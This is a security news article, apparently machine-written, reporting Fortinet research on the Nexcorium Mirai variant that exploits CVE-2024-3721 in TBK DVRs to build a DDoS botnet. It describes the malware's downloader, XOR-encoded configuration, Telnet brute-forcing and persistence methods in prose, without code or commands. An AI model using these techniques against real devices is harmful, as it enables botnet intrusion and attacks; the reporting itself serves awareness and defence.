Ethical Hacking News
Nexcorium Mirai Variant: A New Threat Emerges Through Vulnerability in TBK DVRs
A new variant of Mirai malware, dubbed Nexcorium, has been discovered to exploit a vulnerability in TBK DVR devices and launch DDoS attacks. The threat highlights the importance of regular software updates and vigilance when it comes to securing our digital assets.
A new variant of the Mirai malware, dubbed Nexcorium, has been discovered exploiting a vulnerability in TBK DVR devices to launch DDoS attacks. The vulnerability, CVE-2024-3721, allows threat actors to gain initial access to devices and deploy malicious software. Nexcorium uses XOR decoding to extract configuration data, including C2 details, attack commands, and persistence scripts. The malware performs integrity checks and can replicate itself if tampering is detected. Threat actors have already abused this flaw in real-world campaigns, spreading different bots and malware.
The cybersecurity landscape is continuously evolving, and new threats emerge every day to compromise our safety and security. Recently, a new variant of the Mirai malware, dubbed Nexcorium, has been discovered that takes advantage of a vulnerability in TBK DVR devices to launch distributed denial-of-service (DDoS) attacks. This new threat highlights the importance of regular software updates and the need for vigilance when it comes to securing our digital assets.
Fortinet researchers have identified a Mirai variant, called Nexcorium, which exploits a command injection flaw in TBK DVRs to spread malware and launch DDoS attacks. The vulnerability, CVE-2024-3721, was first discovered by security professionals, who noted that it could be exploited by threat actors to gain initial access to devices and deploy malicious software.
According to the report published by Fortinet, the threat actors exploit the CVE-2024-3721 flaw in TBK DVRs to deliver a downloader script that manipulates specific request arguments. The traffic includes a custom "X-Hacked-By" header referencing "Nexus Team," suggesting a possible attribution, although the group remains largely unknown.
The downloaded script, named "dvr," downloads malware samples labeled "nexuscorp" for multiple Linux architectures such as ARM, MIPS, and x86-64. After setting full execution permissions and running the payload, Nexcorium enables infection across diverse devices and expands the botnet footprint.
An analysis of one of the malware samples, "nexuscorp.x86," reveals Nexcorium, a Mirai-like malware that displays a takeover message upon execution. It uses XOR decoding to extract configuration data, including C2 details, attack commands, and persistence scripts. Like other Mirai variants, it features watchdog, scanner, and attack modules.
Nexcorium performs integrity checks and can replicate itself if tampering is detected. The malware has a similar architecture to the Mirai variant, including XOR-encoded configuration table initialization, watchdog module, and DDoS attack module. Upon execution, Nexcorium first performs XOR decoding to extract its embedded configuration, which includes C2 server domain and port, persistence-related shell commands, a hard-coded brute-force wordlist, DDoS attack commands retrieved from the C2 server, and embedded exploit code.
The malware also embeds exploits such as CVE-2017-17215 targeting Huawei devices and includes a large list of default credentials to brute-force Telnet access. Once inside a system, Nexcorium verifies the device architecture, executes commands, and establishes persistence by copying itself into system directories.
Nexcorium ensures persistence through multiple methods: it modifies /etc/inittab to restart automatically, updates /etc/rc.local for startup execution, creates a systemd service, and adds a cron job. After setup, it deletes its original binary to evade detection.
The malware supports various DDoS attacks, including UDP and TCP floods, and connects to a C2 server to receive commands. It can also stop attacks or terminate itself when instructed.
Threat actors have already abused this flaw in real-world campaigns. In the past year, it was exploited to spread different bots, including a Mirai-based strain, the ShadowV2 botnet, and a newer botnet known as RondoDox. In September 2025, CloudSEK revealed a large loader-as-a-service operation that pushed RondoDox, Mirai, and Morte malware by exploiting weak passwords and outdated vulnerabilities across routers, IoT systems, and enterprise software.
The discovery of Nexcorium highlights the need for vigilance in securing our digital assets. It emphasizes the importance of regular software updates, patching, and monitoring for security breaches. As the threat landscape continues to evolve, it is crucial that we stay informed about emerging threats like Nexcorium Mirai variant.
Related Information:
https://www.ethicalhackingnews.com/articles/Nexcorium-Mirai-Variant-A-New-Threat-Emerges-Through-Vulnerability-in-TBK-DVRs-ehn.shtml
https://securityaffairs.com/190974/malware/nexcorium-mirai-variant-exploits-tbk-dvr-flaw-to-launch-ddos-attacks.html
https://thehackernews.com/2026/04/mirai-variant-nexcorium-exploits-cve.html
https://www.fortinet.com/blog/threat-research/tracking-mirai-variant-nexcorium-a-vulnerability-driven-iot-botnet-campaign
https://nvd.nist.gov/vuln/detail/CVE-2017-17215
https://www.cvedetails.com/cve/CVE-2017-17215/
https://nvd.nist.gov/vuln/detail/CVE-2024-3721
https://www.cvedetails.com/cve/CVE-2024-3721/
https://cybersecuritynews.com/new-chinese-nexus-apt-hackers-attacking-organizations/
https://gbhackers.com/nexus-apt-group/
Published: Sat Apr 18 06:38:08 2026 by llama3.2 3B Q4_K_M
